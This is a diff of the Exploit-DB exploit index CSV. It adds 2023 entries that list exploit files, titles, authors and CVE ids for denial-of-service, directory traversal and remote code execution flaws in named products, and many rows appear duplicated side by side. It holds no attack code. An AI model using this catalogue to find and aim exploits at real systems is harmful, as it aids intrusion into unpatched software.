48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,,2020-04-10,2020-04-10,0,,,,,, 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi,,2020-04-10,2020-04-10,0,,,,,,
48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,,2020-04-23,2020-04-23,0,,,,,, 48373,exploits/cgi/webapps/48373.rb,"Zen Load Balancer 3.10.1 - Directory Traversal (Metasploit)",2020-04-23,"Dhiraj Mishra",webapps,cgi,,2020-04-23,2020-04-23,0,,,,,,
@ -3032,6 +3034,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,,2020-05-08,2020-05-08,0,,,,,, 48441,exploits/hardware/dos/48441.sh,"Extreme Networks Aerohive HiveOS 11.0 - Remote Denial of Service (PoC)",2020-05-08,LiquidWorm,dos,hardware,,2020-05-08,2020-05-08,0,,,,,,
19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware,,2012-06-11,2016-12-09,1,OSVDB-82780;CVE-2012-1493,,,,,https://www.trustmatta.com/advisories/MATTA-2012-002.txt 19064,exploits/hardware/dos/19064.txt,"F5 BIG-IP - Authentication Bypass (PoC)",2012-06-11,"Florent Daigniere",dos,hardware,,2012-06-11,2016-12-09,1,OSVDB-82780;CVE-2012-1493,,,,,https://www.trustmatta.com/advisories/MATTA-2012-002.txt
10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware,,2010-01-02,,1,,,,,, 10947,exploits/hardware/dos/10947.txt,"Facebook for iPhone - Persistent Cross-Site Scripting Denial of Service",2010-01-03,marco_,dos,hardware,,2010-01-02,,1,,,,,,
51326,exploits/hardware/dos/51326.py,"FortiRecorder 6.4.3 - Denial of Service",2023-04-08,"Mohammed Adel",dos,hardware,,2023-04-08,2023-04-08,0,CVE-2022-41333,,,,,
27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware,,2013-07-27,2013-07-27,0,CVE-2013-0699;OSVDB-92804,,,,, 27131,exploits/hardware/dos/27131.py,"Galil-RIO Modbus - Denial of Service",2013-07-27,Sapling,dos,hardware,,2013-07-27,2013-07-27,0,CVE-2013-0699;OSVDB-92804,,,,,
8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware,,2009-03-22,,1,OSVDB-53518;CVE-2009-1152,,,,, 8260,exploits/hardware/dos/8260.txt,"Gigaset SE461 WiMAX Router - Remote Denial of Service",2009-03-23,Benkei,dos,hardware,,2009-03-22,,1,OSVDB-53518;CVE-2009-1152,,,,,
13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware,,2010-06-10,2016-10-27,1,,,goodreader_poc.xls,,, 13825,exploits/hardware/dos/13825.txt,"GoodiWare GoodReader iPhone - '.XLS' Denial of Service",2010-06-11,"Matthew Bergin",dos,hardware,,2010-06-10,2016-10-27,1,,,goodreader_poc.xls,,,
@ -3847,6 +3850,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",2022-06-03,LiquidWorm,remote,hardware,,2022-06-03,2022-06-03,0,,,,,, 50949,exploits/hardware/remote/50949.py,"Schneider Electric C-Bus Automation Controller (5500SHAC) 1.10 - Remote Code Execution (RCE)",2022-06-03,LiquidWorm,remote,hardware,,2022-06-03,2022-06-03,0,,,,,,
39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01 39522,exploits/hardware/remote/39522.txt,"Schneider Electric SBO / AS - Multiple Vulnerabilities",2016-03-03,"Karn Ganeshen",remote,hardware,,2016-03-03,2016-03-03,0,CVE-2016-2278,,,,,https://ics-cert.us-cert.gov/advisories/ICSA-16-061-01
50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,, 50987,exploits/hardware/remote/50987.ps1,"Schneider Electric SpaceLogic C-Bus Home Controller (5200WHC2) - Remote Code Execution",2022-07-29,LiquidWorm,remote,hardware,,2022-07-29,2022-07-29,0,,,,,,
51320,exploits/hardware/remote/51320.txt,"Schneider Electric v1.0 - Directory traversal & Broken Authentication",2023-04-07,"Parsa Rezaie Khiabanloo",remote,hardware,,2023-04-07,2023-04-08,0,,,,,,
50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,, 50936,exploits/hardware/remote/50936.txt,"SDT-CW3B1 1.1.0 - OS Command Injection",2022-05-17,"Ahmed Alroky",remote,hardware,,2022-05-17,2022-05-17,0,CVE-2021-46422,,,,,
37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,, 37184,exploits/hardware/remote/37184.py,"Seagate Central 2014.0410.0026-F - Remote Command Execution",2015-06-03,"Jeremy Brown",remote,hardware,,2015-06-04,2016-12-04,0,OSVDB-122937,,,,,
43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548 43659,exploits/hardware/remote/43659.md,"Seagate Personal Cloud - Multiple Vulnerabilities",2018-01-11,SecuriTeam,remote,hardware,,2018-01-16,2018-01-16,0,CVE-2018-5347,,,,,https://blogs.securiteam.com/index.php/archives/3548
@ -3989,6 +3993,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,,2020-08-07,2020-08-07,0,,,,,, 48736,exploits/hardware/webapps/48736.txt,"All-Dynamics Digital Signage System 2.0.2 - Cross-Site Request Forgery (Add Admin)",2020-08-07,LiquidWorm,webapps,hardware,,2020-08-07,2020-08-07,0,,,,,,
32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80,2014-03-26,2014-03-26,0,CVE-2014-1982;OSVDB-105060,,,,, 32545,exploits/hardware/webapps/32545.txt,"Allied Telesis AT-RG634A ADSL Broadband Router - Web Shell",2014-03-26,"Groundworks Technologies",webapps,hardware,80,2014-03-26,2014-03-26,0,CVE-2014-1982;OSVDB-105060,,,,,
20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware,,2012-08-20,2012-08-20,0,OSVDB-85508,,,,, 20667,exploits/hardware/webapps/20667.txt,"Alpha Networks ADSL2/2+ Wireless Router ASL-26555 - Password Disclosure",2012-08-20,"Alberto Ortega",webapps,hardware,,2012-08-20,2012-08-20,0,OSVDB-85508,,,,,
51325,exploits/hardware/webapps/51325.py,"Altenergy Power Control Software C1.2.5 - OS command injection",2023-04-08,"Ahmed Alroky",webapps,hardware,,2023-04-08,2023-04-08,0,CVE-2023-28343,,,,,
9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80,2009-11-15,,1,OSVDB-60315;OSVDB-60314,,,,, 9975,exploits/hardware/webapps/9975.txt,"Alteon OS BBI (Nortell) - Cross-Site Scripting / Cross-Site Request Forgery",2009-11-16,"Alexey Sintsov",webapps,hardware,80,2009-11-15,,1,OSVDB-60315;OSVDB-60314,,,,,
47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36 47188,exploits/hardware/webapps/47188.py,"Amcrest Cameras 2.520.AC00.18.R - Unauthenticated Audio Streaming",2019-07-30,"Jacob Baines",webapps,hardware,,2019-07-30,2019-07-30,1,CVE-2019-3948,"Authentication Bypass / Credentials Bypass (AB/CB)",,,,https://www.tenable.com/security/research/tra-2019-36
37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,, 37298,exploits/hardware/webapps/37298.txt,"Apexis IP CAM - Information Disclosure",2015-06-16,"Sunplace Solutions",webapps,hardware,80,2015-06-16,2016-10-10,1,OSVDB-123251,,,,,
@ -5400,6 +5405,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,,2020-04-24,2020-04-24,0,,,,,, 48380,exploits/java/webapps/48380.txt,"Furukawa Electric ConsciusMAP 2.8.1 - Remote Code Execution",2020-04-24,LiquidWorm,webapps,java,,2020-04-24,2020-04-24,0,,,,,,
44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,,2018-05-21,2018-05-21,0,,,,,http://www.exploit-db.comgitbucket.war, 44668,exploits/java/webapps/44668.py,"GitBucket 4.23.1 - Remote Code Execution",2018-05-21,"Kacper Szurek",webapps,java,,2018-05-21,2018-05-21,0,,,,,http://www.exploit-db.comgitbucket.war,
39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848,2016-01-27,2016-01-27,1,,,,http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-194716.png,, 39241,exploits/java/webapps/39241.py,"GlassFish Server - Arbitrary File Read",2016-01-15,bingbing,webapps,java,4848,2016-01-27,2016-01-27,1,,,,http://www.exploit-db.com/screenshots/idlt39500/screen-shot-2016-01-26-at-194716.png,,
51339,exploits/java/webapps/51339.java,"Goanywhere Encryption helper 7.1.1 - Remote Code Execution (RCE)",2023-04-08,"Youssef Muhammad",webapps,java,,2023-04-08,2023-04-08,0,CVE-2023-0669,,,,,
41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,,2017-02-27,2017-02-27,0,,,,,http://www.exploit-db.comgrails-pdf-0.6.zip, 41466,exploits/java/webapps/41466.py,"Grails PDF Plugin 0.6 - XML External Entity Injection",2017-02-21,"Charles Fol",webapps,java,,2017-02-27,2017-02-27,0,,,,,http://www.exploit-db.comgrails-pdf-0.6.zip,
28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java,,2006-06-27,2013-09-06,1,,,,,,https://www.securityfocus.com/bid/18677/info 28116,exploits/java/webapps/28116.txt,"H-Sphere 2.5.1 - Multiple Cross-Site Scripting Vulnerabilities",2006-06-27,r0t,webapps,java,,2006-06-27,2013-09-06,1,,,,,,https://www.securityfocus.com/bid/18677/info
22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java,,2003-06-09,2012-11-16,1,OSVDB-4329,,,,,https://www.securityfocus.com/bid/7855/info 22752,exploits/java/webapps/22752.txt,"H-Sphere 2.x - HTML Template Inclusion Cross-Site Scripting",2003-06-09,"Lorenzo Hernandez Garcia-Hierro",webapps,java,,2003-06-09,2012-11-16,1,OSVDB-4329,,,,,https://www.securityfocus.com/bid/7855/info
@ -5821,6 +5827,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp,,2010-10-20,2010-10-20,0,CVE-2010-3514,,,,, 15290,exploits/jsp/webapps/15290.txt,"Oracle Sun Java System Web Server - HTTP Response Splitting",2010-10-20,"Roberto Suggi Liverani",webapps,jsp,,2010-10-20,2010-10-20,0,CVE-2010-3514,,,,,
25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp,,2005-03-08,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12752/info 25198,exploits/jsp/webapps/25198.txt,"OutStart Participate Enterprise 3 - Multiple Access Validation Vulnerabilities",2005-03-08,Altrus,webapps,jsp,,2005-03-08,2013-05-04,1,,,,,,https://www.securityfocus.com/bid/12752/info
9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp,,2009-10-14,,1,CVE-2006-5675;OSVDB-33926,,,,,http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/ 9958,exploits/jsp/webapps/9958.txt,"Pentaho 1.7.0.1062 - Cross-Site Scripting / Information Disclosure",2009-10-15,antisnatchor,webapps,jsp,,2009-10-14,,1,CVE-2006-5675;OSVDB-33926,,,,,http://antisnatchor.com/2009/06/20/pentaho-1701062-multiple-vulnerabilities/
51350,exploits/jsp/webapps/51350.txt,"Pentaho BA Server EE 9.3.0.0-428 - Remote Code Execution (RCE) (Unauthenticated)",2023-04-08,dwbzn,webapps,jsp,,2023-04-08,2023-04-08,0,CVE-2022-43939;CVE-2022-43769,,,,,
38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp,,2013-01-22,2015-09-18,1,CVE-2013-1410;OSVDB-89567,,,,,https://www.securityfocus.com/bid/57514/info 38235,exploits/jsp/webapps/38235.txt,"Perforce P4Web - Multiple Cross-Site Scripting Vulnerabilities",2013-01-22,"Christy Philip Mathew",webapps,jsp,,2013-01-22,2015-09-18,1,CVE-2013-1410;OSVDB-89567,,,,,https://www.securityfocus.com/bid/57514/info
25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp,,2005-05-09,2013-05-22,1,CVE-2005-1193;OSVDB-16439,,,,,https://www.securityfocus.com/bid/13545/info 25628,exploits/jsp/webapps/25628.txt,"phpBB 2.0.x - 'BBCode.php' URL Tag",2005-05-09,Papados,webapps,jsp,,2005-05-09,2013-05-22,1,CVE-2005-1193;OSVDB-16439,,,,,https://www.securityfocus.com/bid/13545/info
32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp,,2009-01-07,2014-04-07,1,CVE-2009-0699;OSVDB-52965,,,,,https://www.securityfocus.com/bid/33153/info 32708,exploits/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 - '/pagesUTF8/auftrag_allgemeinauftrag.jsp' Multiple Cross-Site Scripting Vulnerabilities",2009-01-07,"Matteo Ignaccolo",webapps,jsp,,2009-01-07,2014-04-07,1,CVE-2009-0699;OSVDB-52965,,,,,https://www.securityfocus.com/bid/33153/info
@ -7004,6 +7011,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20 44601,exploits/linux/local/44601.txt,"GNU wget - Cookie Injection",2018-05-06,"Harry Sintonen",local,linux,,2018-05-09,2018-05-09,0,CVE-2018-0494,,,,,http://seclists.org/fulldisclosure/2018/May/20
3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar, 3154,exploits/linux/local/3154.c,"GNU/Linux mbse-bbs 0.70.0 - Local Buffer Overflow",2007-01-18,prdelka,local,linux,,2007-01-17,2011-09-15,1,OSVDB-33551;CVE-2007-0368,,,,http://www.exploit-db.commbsebbs-0.70.0.tar,
27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux,,2006-02-15,2013-07-31,1,CVE-2006-0455;OSVDB-23221,,,,,https://www.securityfocus.com/bid/16663/info 27231,exploits/linux/local/27231.txt,"GnuPG 1.x - Detached Signature Verification Bypass",2006-02-15,taviso,local,linux,,2006-02-15,2013-07-31,1,CVE-2006-0455;OSVDB-23221,,,,,https://www.securityfocus.com/bid/16663/info
51331,exploits/linux/local/51331.txt,"Google Chrome 109.0.5414.74 - Code Execution via missing lib file (Ubuntu)",2023-04-08,"Rafay Baloch and Muhammad Samak",local,linux,,2023-04-08,2023-04-08,0,,,,,,
40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,,2016-12-19,2018-11-17,1,,,,,,https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html 40943,exploits/linux/local/40943.txt,"Google Chrome (Fedora 25 / Ubuntu 16.04) - 'tracker-extract' / 'gnome-video-thumbnailer' + 'totem' Drive-By Download",2016-12-13,"Chris Evans",local,linux,,2016-12-19,2018-11-17,1,,,,,,https://scarybeastsecurity.blogspot.com/2016/12/redux-compromising-linux-using-snes.html
50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",2021-10-07,"Kiran Ghimire",local,linux,,2021-10-07,2021-10-07,1,CVE-2021-22557,,,,http://www.exploit-db.comslo-generator-2.0.0.tar.gz, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",2021-10-07,"Kiran Ghimire",local,linux,,2021-10-07,2021-10-07,1,CVE-2021-22557,,,,http://www.exploit-db.comslo-generator-2.0.0.tar.gz,
1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux,,2005-08-29,2016-12-19,1,OSVDB-19082;CVE-2005-2772,,,,, 1187,exploits/linux/local/1187.c,"Gopher 3.0.9 - '+VIEWS' Client-Side Buffer Overflow",2005-08-30,vade79,local,linux,,2005-08-29,2016-12-19,1,OSVDB-19082;CVE-2005-2772,,,,,
@ -10293,6 +10301,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple,,2015-10-13,2015-10-13,0,CVE-2015-7805;OSVDB-128868,,,,, 38447,exploits/multiple/local/38447.pl,"libsndfile 1.0.25 - Local Heap Overflow",2015-10-13,"Marco Romano",local,multiple,,2015-10-13,2015-10-13,0,CVE-2015-7805;OSVDB-128868,,,,,
1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple,,2006-03-04,2016-06-29,1,OSVDB-23782;CVE-2005-1544;OSVDB-16350,,,,http://www.exploit-db.comtiff-3.7.1.tar.gz, 1554,exploits/multiple/local/1554.c,"LibTiff 3.7.1 - BitsPerSample Tag Local Buffer Overflow",2006-03-05,"Agustin Gianni",local,multiple,,2006-03-04,2016-06-29,1,OSVDB-23782;CVE-2005-1544;OSVDB-16350,,,,http://www.exploit-db.comtiff-3.7.1.tar.gz,
12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple,,2010-04-06,2017-11-15,1,,,,,, 12103,exploits/multiple/local/12103.txt,"Local Glibc Shared Library (.so) 2.11.1 - Code Execution",2010-04-07,Rh0,local,multiple,,2010-04-06,2017-11-15,1,,,,,,
51333,exploits/multiple/local/51333.rb,"Lucee Scheduled Job v1.0 - Command Execution",2023-04-08,"Alexander Philiotis",local,multiple,,2023-04-08,2023-04-08,0,,,,,,
44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,,2018-02-20,2018-02-20,1,CVE-2017-6516,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/74c6e21f49bc15ebef253886c3f37ace419c6f32/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb 44150,exploits/multiple/local/44150.rb,"MagniComp SysInfo - mcsiwrapper Privilege Escalation (Metasploit)",2018-02-20,Metasploit,local,multiple,,2018-02-20,2018-02-20,1,CVE-2017-6516,"Metasploit Framework (MSF)",,,,https://raw.githubusercontent.com/rapid7/metasploit-framework/74c6e21f49bc15ebef253886c3f37ace419c6f32/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb
44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf 44006,exploits/multiple/local/44006.html,"Marked2 - Local File Disclosure",2018-02-06,"Corben Leo",local,multiple,,2018-02-08,2018-02-08,0,,,,,,http://www.lynxsecurity.io/releases/Local%20File%20Disclosure%20in%20Marked2.pdf
19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info 19796,exploits/multiple/local/19796.c,"Matt Kimball and Roger Wolff mtr 0.28/0.41 / Turbolinux 3.5 b2/4.2/4.4/6.0 - mtr (2)",2000-03-03,"Babcia Padlina",local,multiple,,2000-03-03,2012-07-13,1,CVE-2000-0172;OSVDB-5268,,,,,https://www.securityfocus.com/bid/1038/info
@ -10960,6 +10969,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info 19945,exploits/multiple/remote/19945.txt,"MetaProducts Offline Explorer 1.0 x/1.1 x/1.2 x - Directory Traversal",2000-05-19,Wyzewun,remote,multiple,,2000-05-19,2012-07-19,1,CVE-2000-0436;OSVDB-7937,,,,,https://www.securityfocus.com/bid/1231/info
21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,, 21927,exploits/multiple/remote/21927.rb,"Metasploit < 4.4 - pcap_log Plugin Privilege Escalation (Metasploit)",2012-10-12,0a29406d9794e4f9b30b3c5d6702c708,remote,multiple,,2012-10-12,2012-10-12,1,OSVDB-86822,"Metasploit Framework (MSF)",,,,
40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,, 40415,exploits/multiple/remote/40415.rb,"Metasploit Web UI - Diagnostic Console Command Execution (Metasploit)",2016-09-22,Metasploit,remote,multiple,,2016-09-22,2016-09-22,1,,"Metasploit Framework (MSF)",,,,
51328,exploits/multiple/remote/51328.txt,"Microsoft Excel 365 MSO (Version 2302 Build 16.0.16130.20186) 64-bit - Remote Code Execution (RCE)",2023-04-08,nu11secur1ty,remote,multiple,,2023-04-08,2023-04-08,0,CVE-2023-23399,,,,,
19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info 19194,exploits/multiple/remote/19194.txt,"Microsoft IIS 3.0/4.0 - Using ASP and FSO To Read Server Files",1999-02-11,"Gary Geisbert",remote,multiple,,1999-02-11,2012-06-16,1,CVE-1999-1375;OSVDB-13507,,,,,https://www.securityfocus.com/bid/230/info
19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950 19742,exploits/multiple/remote/19742.txt,"Microsoft IIS 3.0/4.0 / Microsoft Index Server 2.0 - Directory Traversal (MS00-006)",2000-02-02,Mnemonix,remote,multiple,,2000-02-02,2012-07-10,1,CVE-2000-0126;OSVDB-96;MS00-006,,,,,https://www.securityfocus.com/bid/950
19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple,,1998-01-01,2012-06-13,1,OSVDB-276;CVE-1999-0278,,,,,https://www.securityfocus.com/bid/149/info 19118,exploits/multiple/remote/19118.txt,"Microsoft IIS 3.0/4.0 / Microsoft Personal Web Server 2.0/3.0/4.0 - ASP Alternate Data Streams",1998-01-01,"Paul Ashton",remote,multiple,,1998-01-01,2012-06-13,1,OSVDB-276;CVE-1999-0278,,,,,https://www.securityfocus.com/bid/149/info
@ -11475,6 +11485,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,, 45979,exploits/multiple/webapps/45979.txt,"Adobe ColdFusion 2018 - Arbitrary File Upload",2018-12-11,"Vahagn Vardanyan",webapps,multiple,,2018-12-11,2018-12-11,0,CVE-2018-15961,,,,,
40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt 40346,exploits/multiple/webapps/40346.py,"Adobe ColdFusion < 11 Update 10 - XML External Entity Injection",2016-09-07,"Dawid Golunski",webapps,multiple,,2016-09-07,2016-09-07,1,CVE-2016-4264,,,,,http://legalhackers.com/advisories/Adobe-ColdFusion-11-XXE-Exploit-CVE-2016-4264.txt
49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,, 49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,,2021-02-09,2023-04-06,0,CVE-2023-22232,,,,,
51327,exploits/multiple/webapps/51327.txt,"Adobe Connect 11.4.5 - Local File Disclosure",2023-04-08,h4shur,webapps,multiple,,2023-04-08,2023-04-08,0,CVE-2023-22232,,,,,
33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info 33180,exploits/multiple/webapps/33180.txt,"Adobe Flex SDK 3.x - 'index.template.html' Cross-Site Scripting",2009-08-19,"Adam Bixby",webapps,multiple,,2009-08-19,2014-05-05,1,CVE-2009-1879;OSVDB-57340,,,,,https://www.securityfocus.com/bid/36087/info
